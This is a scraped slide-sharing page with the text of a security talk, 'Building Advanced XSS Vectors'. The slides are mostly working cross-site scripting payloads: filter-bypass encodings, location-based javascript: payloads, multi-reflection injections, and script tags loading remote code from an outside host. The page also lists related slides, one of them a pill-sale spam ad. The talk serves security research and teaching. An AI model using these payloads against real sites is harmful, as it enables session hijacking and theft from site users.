libinjection: from SQLi to XSS  by Nick Galbreath
libinjection: from SQLi to XSS  by Nick Galbreathlibinjection: from SQLi to XSS  by Nick Galbreath
libinjection: from SQLi to XSS  by Nick Galbreath
 
How To Detect Xss
How To Detect XssHow To Detect Xss
How To Detect Xss
 
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
 
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
 
XSS and CSRF with HTML5
XSS and CSRF with HTML5XSS and CSRF with HTML5
XSS and CSRF with HTML5
 
JavaScript Static Security Analysis made easy with JSPrime
JavaScript Static Security Analysis made easy with JSPrimeJavaScript Static Security Analysis made easy with JSPrime
JavaScript Static Security Analysis made easy with JSPrime
 
Sucuri Webinar: How to Clean a Hacked Magento Website
Sucuri Webinar: How to Clean a Hacked Magento WebsiteSucuri Webinar: How to Clean a Hacked Magento Website
Sucuri Webinar: How to Clean a Hacked Magento Website
 
Xss is more than a simple threat
Xss is more than a simple threatXss is more than a simple threat
Xss is more than a simple threat
 
Pengenalan HTML5, Mobile Application, dan Intel XDK
Pengenalan HTML5, Mobile Application, dan Intel XDKPengenalan HTML5, Mobile Application, dan Intel XDK
Pengenalan HTML5, Mobile Application, dan Intel XDK
 
Sucuri Webinar: Defending Your Google Brand Reputation and Analytics Reports
Sucuri Webinar: Defending Your Google Brand Reputation and Analytics ReportsSucuri Webinar: Defending Your Google Brand Reputation and Analytics Reports
Sucuri Webinar: Defending Your Google Brand Reputation and Analytics Reports
 
Owasp AppSecEU 2015 - BeEF Session
Owasp AppSecEU 2015 - BeEF SessionOwasp AppSecEU 2015 - BeEF Session
Owasp AppSecEU 2015 - BeEF Session
 
{{more}} Kibana4
{{more}} Kibana4{{more}} Kibana4
{{more}} Kibana4
 
How to-catch-a-chameleon-steven seeley-ruxcon-2012
How to-catch-a-chameleon-steven seeley-ruxcon-2012How to-catch-a-chameleon-steven seeley-ruxcon-2012
How to-catch-a-chameleon-steven seeley-ruxcon-2012
 
Final lfh presentation (3)
Final lfh presentation (3)Final lfh presentation (3)
Final lfh presentation (3)
 
Apache安装配置mod security
Apache安装配置mod securityApache安装配置mod security
Apache安装配置mod security
 
D2 t2 steven seeley - ghost in the windows 7 allocator
D2 t2 steven seeley - ghost in the windows 7 allocatorD2 t2 steven seeley - ghost in the windows 7 allocator
D2 t2 steven seeley - ghost in the windows 7 allocator
 
File upload vulnerabilities & mitigation
File upload vulnerabilities & mitigationFile upload vulnerabilities & mitigation
File upload vulnerabilities & mitigation
 

Similar to Building Advanced XSS Vectors

the next web now
the next web nowthe next web now
the next web nowzulin Gu
 
Modern frontend development with VueJs
Modern frontend development with VueJsModern frontend development with VueJs
Modern frontend development with VueJsTudor Barbu
 
Andriy Shalaenko - GO security tips
Andriy Shalaenko - GO security tipsAndriy Shalaenko - GO security tips
Andriy Shalaenko - GO security tipsOWASP Kyiv
 
Hands-On XML Attacks
Hands-On XML AttacksHands-On XML Attacks
Hands-On XML AttacksToe Khaing
 
#NewMeetup Performance
#NewMeetup Performance#NewMeetup Performance
#NewMeetup PerformanceJustin Cataldo
 
Private slideshow
Private slideshowPrivate slideshow
Private slideshowsblackman
 
Attacks against Microsoft network web clients
Attacks against Microsoft network web clients Attacks against Microsoft network web clients
Attacks against Microsoft network web clients Positive Hack Days
 
Building High Performance Web Applications and Sites
Building High Performance Web Applications and SitesBuilding High Performance Web Applications and Sites
Building High Performance Web Applications and Sitesgoodfriday
 
BITM3730 10-3.pptx
BITM3730 10-3.pptxBITM3730 10-3.pptx
BITM3730 10-3.pptxMattMarino13
 
Logstash for SEO: come monitorare i Log del Web Server in realtime
Logstash for SEO: come monitorare i Log del Web Server in realtimeLogstash for SEO: come monitorare i Log del Web Server in realtime
Logstash for SEO: come monitorare i Log del Web Server in realtimeAndrea Cardinale
 
StHack 2014 - Mario "@0x6D6172696F" Heiderich - JSMVCOMFG
StHack 2014 - Mario "@0x6D6172696F" Heiderich - JSMVCOMFGStHack 2014 - Mario "@0x6D6172696F" Heiderich - JSMVCOMFG
StHack 2014 - Mario "@0x6D6172696F" Heiderich - JSMVCOMFGStHack
 

Similar to Building Advanced XSS Vectors (20)

Performance patterns
Performance patternsPerformance patterns
Performance patterns
 
UNIT 1 (7).pptx
UNIT 1 (7).pptxUNIT 1 (7).pptx
UNIT 1 (7).pptx
 
the next web now
the next web nowthe next web now
the next web now
 
Modern frontend development with VueJs
Modern frontend development with VueJsModern frontend development with VueJs
Modern frontend development with VueJs
 
Andriy Shalaenko - GO security tips
Andriy Shalaenko - GO security tipsAndriy Shalaenko - GO security tips
Andriy Shalaenko - GO security tips
 
Hands-On XML Attacks
Hands-On XML AttacksHands-On XML Attacks
Hands-On XML Attacks
 
前端概述
前端概述前端概述
前端概述
 
#NewMeetup Performance
#NewMeetup Performance#NewMeetup Performance
#NewMeetup Performance
 
Private slideshow
Private slideshowPrivate slideshow
Private slideshow
 
Attacks against Microsoft network web clients
Attacks against Microsoft network web clients Attacks against Microsoft network web clients
Attacks against Microsoft network web clients
 
Intro to JavaScript
Intro to JavaScriptIntro to JavaScript
Intro to JavaScript
 
Jquery Basics
Jquery BasicsJquery Basics
Jquery Basics
 
Jquery fundamentals
Jquery fundamentalsJquery fundamentals
Jquery fundamentals
 
Java script
Java scriptJava script
Java script
 
Building High Performance Web Applications and Sites
Building High Performance Web Applications and SitesBuilding High Performance Web Applications and Sites
Building High Performance Web Applications and Sites
 
BITM3730 10-3.pptx
BITM3730 10-3.pptxBITM3730 10-3.pptx
BITM3730 10-3.pptx
 
Logstash for SEO: come monitorare i Log del Web Server in realtime
Logstash for SEO: come monitorare i Log del Web Server in realtimeLogstash for SEO: come monitorare i Log del Web Server in realtime
Logstash for SEO: come monitorare i Log del Web Server in realtime
 
Dart Workshop
Dart WorkshopDart Workshop
Dart Workshop
 
StHack 2014 - Mario "@0x6D6172696F" Heiderich - JSMVCOMFG
StHack 2014 - Mario "@0x6D6172696F" Heiderich - JSMVCOMFGStHack 2014 - Mario "@0x6D6172696F" Heiderich - JSMVCOMFG
StHack 2014 - Mario "@0x6D6172696F" Heiderich - JSMVCOMFG
 
Lumberjack XPath 101
Lumberjack XPath 101Lumberjack XPath 101
Lumberjack XPath 101
 

Recently uploaded

Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Drew Madelung
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century educationjfdjdjcjdnsjd
 
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024The Digital Insurer
 
Top 10 Most Downloaded Games on Play Store in 2024
Top 10 Most Downloaded Games on Play Store in 2024Top 10 Most Downloaded Games on Play Store in 2024
Top 10 Most Downloaded Games on Play Store in 2024SynarionITSolutions
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘RTylerCroy
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAndrey Devyatkin
 
GenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdfGenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdflior mazor
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityPrincipled Technologies
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherRemote DBA Services
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Scriptwesley chun
 
Top 5 Benefits OF Using Muvi Live Paywall For Live Streams
Top 5 Benefits OF Using Muvi Live Paywall For Live StreamsTop 5 Benefits OF Using Muvi Live Paywall For Live Streams
Top 5 Benefits OF Using Muvi Live Paywall For Live StreamsRoshan Dwivedi
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...Martijn de Jong
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsJoaquim Jorge
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...DianaGray10
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationSafe Software
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonAnna Loughnan Colquhoun
 
Manulife - Insurer Innovation Award 2024
Manulife - Insurer Innovation Award 2024Manulife - Insurer Innovation Award 2024
Manulife - Insurer Innovation Award 2024The Digital Insurer
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024Rafal Los
 
Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...apidays
 

Recently uploaded (20)

Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century education
 
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024
 
Top 10 Most Downloaded Games on Play Store in 2024
Top 10 Most Downloaded Games on Play Store in 2024Top 10 Most Downloaded Games on Play Store in 2024
Top 10 Most Downloaded Games on Play Store in 2024
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of Terraform
 
GenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdfGenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdf
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
 
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
Top 5 Benefits OF Using Muvi Live Paywall For Live Streams
Top 5 Benefits OF Using Muvi Live Paywall For Live StreamsTop 5 Benefits OF Using Muvi Live Paywall For Live Streams
Top 5 Benefits OF Using Muvi Live Paywall For Live Streams
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
Manulife - Insurer Innovation Award 2024
Manulife - Insurer Innovation Award 2024Manulife - Insurer Innovation Award 2024
Manulife - Insurer Innovation Award 2024
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...
 

Building Advanced XSS Vectors

  • 3. About - Agenda ● About ● Vector Scheme ● Vector Builder (webGun) ● Agnostic Event Handlers ● Reusing Native Code ● Filter Bypass ● Location Based Payloads ● Multi Reflection
  • 4. About - Speaker ● Security researcher @sucurisecurity ● Former #1 @openbugbounty ● Some HoF & acknowledgements ● XSS expert
  • 5. About - Presentation ● Not just another talk on XSS ● Use of alert(1) for didactic purposes ● Mainly about event based XSS ● Some stuff may be hard to follow
  • 7. Vector Scheme ● Regular <tag handler=code> Example: <svg onload=alert(1)>
  • 8. Vector Scheme ● Full extra1 <tag spacer1 extra2 spacer2 handler spacer3 = spacer4 code spacer5> extra3 Example: <table><thead%0Cstyle=font-size:700px%0Donmouseover%0A=%0Bprompt (1)%09><td>AAAAAAAAA
  • 10. Vector Builder (webGun) ● Interactive cheat sheet ● Builder of XSS vectors/payloads ● More than 3k unique combinations ● Event or tag oriented ● Handlers by browser ● Handlers by length* ● Manual vector editing ● Test on target or default test page * for filter bypass procedure.
  • 11.
  • 12.
  • 14. Agnostic Event Handlers ● Used with almost any tag ● Ones that work with arbitrary tags Example: <brute ● Most require UI ● Work on all major browsers
  • 15. Agnostic Event Handlers - List ● onblur ● onclick ● oncopy ● oncontextmenu ● oncut ● ondblclick ● ondrag ● onfocus ● oninput ● onkeydown ● onkeypress ● onkeyup ● onmousedown ● onmousemove ● onmouseout ● onmouseover ● onmouseup ● onpaste
  • 16. Agnostic Event Handlers ● Example: <brute onclick=alert(1)>clickme!
  • 18. Reusing Native Code ● Example 1 ...<input type="hidden" value="INPUT"></form><script type="text/javascript"> function x(){ do something }</script> ● INPUT "><script>alert(1)// or "><script>alert(1)<!--
  • 19. Reusing Native Code ● Injection ...<input type="hidden" value=""><script>alert(1)//"></form><script type=" text/javascript"> function x(){ do something }</script> ● Result ...<input type="hidden" value=""><script>alert(1)//"></form><script type=" text/javascript"> function x(){ do something }</script>
  • 20. Reusing Native Code ● Example 2 … <input type="hidden" value="INPUT" > </form> <script type="text/javascript"> function x() { do something } </script> ● INPUT "><script src="//brutelogic.com.br/1 or "><script src="//3334957647/1
  • 21. Reusing Native Code ● Injection … <input type="hidden" value="" ><script src="//brutelogic.com.br/1" > </form> <script type="text/javascript"> function x() { do something } </script> ● Result … <input type="hidden" value="" ><script src="//brutelogic.com.br/1" > </form> <script type="text/javascript"> function x() { do something } </script>
  • 23. Filter Bypass - Procedure ● Arbitrary tag + fake handler ● Start with 5 chars, increase ● Example <x onxxx=1 (5) pass <x onxxxx=1 (6) pass <x onxxxxx=1 (7) block Up to 6 chars: oncut, onblur, oncopy, ondrag, ondrop, onhelp, onload, onplay, onshow
  • 24. Filter Bypass - Tricks ● Encoding %3Cx onxxx=1 <%78 onxxx=1 <x %6Fnxxx=1 <x o%6Exxx=1 <x on%78xx=1 <x onxxx%3D1 ● Mixed Case <X onxxx=1 <x ONxxx=1 <x OnXxx=1 <X OnXxx=1 ● Doubling <x onxxx=1 onxxx=1
  • 25. Filter Bypass - Tricks ● Spacers <x/onxxx=1 <x%09onxxx=1 <x%0Aonxxx=1 <x%0Conxxx=1 <x%0Donxxx=1 <x%2Fonxxx=1 ● Combo <x%2F1=">%22OnXxx%3D1 ● Quotes <x 1='1'onxxx=1 <x 1="1"onxxx=1 ● Mimetism <x </onxxx=1 (closing tag) <x 1=">" onxxx=1 (text outside tag) <http://onxxx%3D1/ (URL)
  • 27. Location Based Payloads ● Really complex payloads can be built ● document.location properties and similar ● Avoiding special chars (at least between = and >) ● Game over to filter
  • 28. Location Based Payloads - Document Properties ● location.protocol protocol: // domain / path/page ?p= text1 <tag handler=code> text2 # text3
  • 29. Location Based Payloads - Document Properties ● location.hostname, document.domain protocol: // domain / path/page ?p= text1 <tag handler=code> text2 # text3
  • 30. Location Based Payloads - Document Properties ● location.origin protocol: // domain / path/page ?p= text1 <tag handler=code> text2 # text3
  • 31. Location Based Payloads - Document Properties ● location.pathname protocol: // domain / path/page ?p= text1 <tag handler=code> text2 # text3
  • 32. Location Based Payloads - Document Properties ● location.search protocol: // domain / path/page ?p= text1 <tag handler=code> text2 # text3
  • 33. Location Based Payloads - Document Properties ● previousSibling.nodeValue, document.body.textContent* ("Before") protocol: // domain / path/page ?p= text1 <tag handler=code> text2 # text3 * (may need to close the injected tag)
  • 34. Location Based Payloads - Document Properties ● tagName, nodeName ("Itself") protocol: // domain / path/page ?p= text1 <tag handler=code> text2 # text3
  • 35. Location Based Payloads - Document Properties ● outerHTML ("Itself") protocol: // domain / path/page ?p= text1 <tag handler=code> text2 # text3
  • 36. Location Based Payloads - Document Properties ● innerHTML* ("After") protocol: // domain / path/page ?p= text1 <tag handler=code> text2 # text3 * (may need to close the injected tag)
  • 37. Location Based Payloads - Document Properties ● textContent, nextSibling.nodeValue*, firstChild.nodeValue, lastChild. nodeValue ("After") protocol: // domain / path/page ?p= text1 <tag handler=code> text2 # text3 * (may need to close the injected tag)
  • 38. Location Based Payloads - Document Properties ● Location.hash ("Hash") protocol: // domain / path/page ?p= text1 <tag handler=code> text2 # text3
  • 39. Location Based Payloads - Document Properties ● URL, location.href, baseURI, documentURI protocol: // domain / path/page ?p= text1 <tag handler=code> text2 # text3
  • 40. Location Based Payloads - Evolution 1 <svg onload=location='javascript:alert(1)'> <svg onload=location=location.hash.substr(1)>#javascript:alert(1) <svg onload=location='javas'+'cript:'+'ale'+'rt'+location.hash.substr(1)>#(1) <svg onload=location=/javas/.source+cript:/.source+/ale/.source+/rt/. source+location.hash.substr(1)>#(1) <svg onload=location=/javas/.source+/cript:/.source+/ale/.source+/rt/. source+location.hash[1]+1+location.hash[2]>#()
  • 41. Location Based Payloads - Evolution 2 <javascript onclick=alert(tagName)>click me! <javascript:alert(1) onclick=location=tagName>click me! <== doesn't work! So... <javascript onclick=location=tagName+location.hash(1)>click me!#:alert(1) <javascript onclick=location=tagName+innerHTML+location.hash>:/*click me! #*/alert(1) javascript + :"click me! + #"-alert(1) javascrip + t:"click me! + #"-alert(1) javas + cript:"click me! + #"-alert(1)
  • 42. Location Based Payloads - Taxonomy ● By Type 1. Location 2. Location Self 3. Location Self Plus ● By Positioning (Properties) Before < Itself > After # Hash Inside
  • 43. Location Based Payloads - Location ● Location After (innerHTML) <j onclick=location=innerHTML>javascript&colon;alert(1)// ● Location Inside (name+id) <svg id=t:alert(1) name=javascrip onload=location=name+id>
  • 44. Location Based Payloads - Location ● Location Itself + After + Hash (tagName+innerHTML+location.hash) <javascript onclick=location=tagName+innerHTML+location.hash>:/*click me! #*/alert(1) <javascript onclick=location=tagName+innerHTML+location.hash>:'click me!#'- alert(1) <javascript onclick=location=tagName+innerHTML+URL>:"-'click me! </javascript>#'-alert(1) Result: javascript + :"-'click me! + http://..."-'click me</javascript>#'-alert(1)
  • 45. Location Based Payloads - Location ● Location Itself + Hash (tagName+URL) <javascript:"-' onclick=location=tagName+URL>click me!#'-alert(1) (“Labeled Jump”) <javascript: onclick=location=tagName+URL>click me!#%0Aalert(1) Result: javascript: + http://...<javascript: onclick=location=tagName+URL>click me!#% 0Aalert(1)
  • 46. Location Based Payloads - Location ● Location After + Hash (innerHTML+URL) <j onclick=location=innerHTML+URL>javascript:"-'click me!</j>#'-alert(1) <j onclick=location=innerHTML+URL>javascript:</j>#%0Aalert(1)
  • 47. Location Based Payloads - Location ● Location Itself + After + Hash (tagName+innerHTML+URL) <javas onclick=location=tagName+innerHTML+URL>cript:"-'click me!</javas>#'- alert(1) <javas onclick=location=tagName+innerHTML+URL>cript:</javas>#%0Aalert(1)
  • 48. Location Based Payloads - Location ● Location Itself + Before (tagName+previousSibling) "-alert(9)<javascript:" onclick=location=tagName+previousSibling. nodeValue>click me! ● Location Itself + After + Before (tagName+innerHTML+previousSibling) '-alert(9)<javas onclick=location=tagName+innerHTML+previousSibling. nodeValue>cript:'click me!
  • 49. Location Based Payloads - Location ● Location After + Itself (innerHTML+outerHTML) <alert(1)<!-- onclick=location=innerHTML+outerHTML>javascript:1/*click me! */</alert(1)<!-- --> javascript:1/*click me!*/ + <alert(1)<!-- … </alert(1)<!-- --> <j 1="*/""-alert(1)<!-- onclick=location=innerHTML+outerHTML>javascript: /*click me! javascript:/*click me! + <j 1="*/""-alert(1)<!-- …
  • 50. Location Based Payloads - Location ● Location After + Before + Itself (innerHTML+previousSibling+outerHTML) */"<j"-alert(9)<!-- onclick=location=innerHTML+previousSibling. nodeValue+outerHTML>javascript:/*click me! javascript:/*click me! + */" + <j"-alert(9)<!-- ... */"<j 1=-alert(9)// onclick=location=innerHTML+previousSibling. nodeValue+outerHTML>javascript:/*click me! javascript:/*click me! + */" + <j 1="-alert(9)//" ...
  • 51. Location Based Payloads - Location Self ● Location Self Inside p=<svg id=?p=<svg/onload=alert(1)%2B onload=location=id> http://...?p=<svg/onload=alert(1)+ p=<svg id=?p=<script/src=//brutelogic.com.br/1%2B onload=location=id> http://...?p=<script/src=//brutelogic.com.br/1+
  • 52. Location Based Payloads - Location Self ● Location Self After p=<j onclick=location=textContent>?p=%26lt;svg/onload=alert(1)> http://...?p=<svg/onload=alert(1)>
  • 53. Location Based Payloads - Location Self Plus ● Location Self Plus Itself p=<j%26p=<svg%2Bonload=alert(1) onclick=location%2B=outerHTML>click me! http://...?p=%3Cj%26p=%3Csvg%2Bonload=alert(1)%20onclick=location% 2B=outerHTML%3Eclick%20me!<j&p=<svg+onload=alert(1) onclick=" location+=outerHTML">
  • 54. Location Based Payloads - Location Self Plus ● Location Self Plus After p=<j onclick=location%2B=textContent>%26p=%26lt;svg/onload=alert(1)> http://...?p=%3Cj%20onclick=location%2B=textContent%3E%26p=%26lt; svg/onload=alert(1)%3E&p=<svg/onload=alert(1)>
  • 55. Location Based Payloads - Location Self Plus ● Location Self Plus Before p=%26p=%26lt;svg/onload=alert(1)><j onclick=location%2B=document.body. textContent>click me! http://...?p=%26p=%26lt;svg/onload=alert(1)%3E%3Cj%20onclick=location% 2B=document.body.textContent%3Eclick%20me![BODY_CONTENT] &p=<svg/onload=alert(1)>click me!
  • 57. Multi Reflection - Single Input ● Double Reflection - Single Input p='onload=alert(1)><svg/1=' 'onload=alert(1)><svg/1=' … [code] … 'onload=alert(1)><svg/1=' ● Double Reflection - Single Input (script) p=’>alert(1)</script><script/1=’ p=*/alert(1)</script><script>/* */alert(1)</script><script>/* … [code] … */alert(1)</script><script>/*
  • 58. Multi Reflection - Single Input ● Triple Reflection - Single Input p=*/alert(1)">'onload="/*<svg/1=' p=`-alert(1)">'onload="`<svg/1=' `-alert(1)">'onload="`<svg/1=' … [code] … `-alert(1)">'onload="`<svg/1=' … [code] … `-alert(1)">'onload="`<svg/1=' ● Triple Reflection - Single Input (script) p=*/</script>'>alert(1)/*<script/1=' */</script>'>alert(1)/*<script/1=' … [code] … */</script>'>alert(1)/*<script/1=' … [code] … */</script>'>alert(1)/*<script/1='
  • 59. Multi Reflection - Multi Input ● 2 inputs: p=<svg/1='&q='onload=alert(1)> ● 3 inputs: p=<svg 1='&q=onload='/*&r=*/alert(1)'>
  • 60. Conclusion ● XSS vectors can: - be complex; - easily evade filters; - blow your mind.